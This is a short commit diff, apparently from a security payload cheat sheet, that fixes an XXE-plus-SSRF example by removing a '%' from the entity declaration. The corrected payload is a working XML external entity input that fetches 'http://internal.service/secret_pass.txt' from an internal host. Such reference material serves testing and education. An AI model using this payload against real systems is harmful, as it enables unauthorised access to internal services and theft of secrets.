correction of xxe ssrf payload
remove the % from the payload as it's not a parametrized entity
This commit is contained in:
@@ -155,7 +155,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
|
|||||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||||
<!DOCTYPE foo [
|
<!DOCTYPE foo [
|
||||||
<!ELEMENT foo ANY >
|
<!ELEMENT foo ANY >
|
||||||
<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
|
<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
|
||||||
]>
|
]>
|
||||||
<foo>&xxe;</foo>
|
<foo>&xxe;</foo>
|
||||||
```
|
```
|
||||||
|
|||||||
Reference in New Issue
Block a user